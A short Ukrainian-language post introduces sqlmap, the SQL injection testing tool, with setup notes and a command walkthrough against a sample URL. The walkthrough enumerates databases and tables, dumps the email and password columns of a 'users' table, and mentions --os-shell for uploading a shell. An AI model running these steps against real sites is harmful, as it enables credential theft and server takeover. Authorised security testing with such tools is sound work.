sqlmap

254

sqlmap – це платформна утиліта (ЯП: python), що дозволяє тестувати сайти на SQLi (SQL Injection) з величезним списком можливостей.

[#] – Для роботи вам потрібно завантажити інтерпретатор python, підійде як 2, так і 3 гілка.
[#] – http://sqlmap.org/ – посилання на офіційний сайт.
[#] – Дзеркало на скачку (остання версія, на момент посту) – скачати.
[#] – Після установки інтерпретатора, запустіть утиліту через cmd (Windows(WIN + R -> cmd -> cd C:\sqlmap -> python sqlmap.py або ж просто sqlmap.py)) або через Термінал (linux). Де C:\sqlmap – директорія, де лежить сам sqlmap.
[#] – Для havij-юзерів: sqlmap.py -u http://test.org/index.php?id=555 –dbs (після -u URL, команда –dbs витягує список БД. Далі sqlmap.py -u http://test.org/index.php?id=555 -D forum –tables. -D поточна БД, –tables витягує з обраної БД (в нашому випадку з БД forum) список таблиць. Далі sqlmap.py -u http://test.org/index.php?id=555 -D forum -T users –columns. команда –columns витягує список колонок з обраної нами таблиці БД (в нашому випадку users). Далі sqlmap.py -u http://test.org/index.php?id=555 -D forum -T users -C email password –dump. Командою –dump дампим всі значення обраних нами колонок (у нашому випадку email і пароль) з таблиці).
[#] – Підтримує багатопоточність (до 10 потоків).
[#] – Завантаження міні-шелла (якщо дозволяють привілеї), командою –os-shell.
[#] – etc.
[#] – Мануал по софту на хабре.
[#] – Мануал по софту на ксакеп.ру.

sqlmap ШУП ТА ВНП

Скачать [sqlmap]

Скачать [python]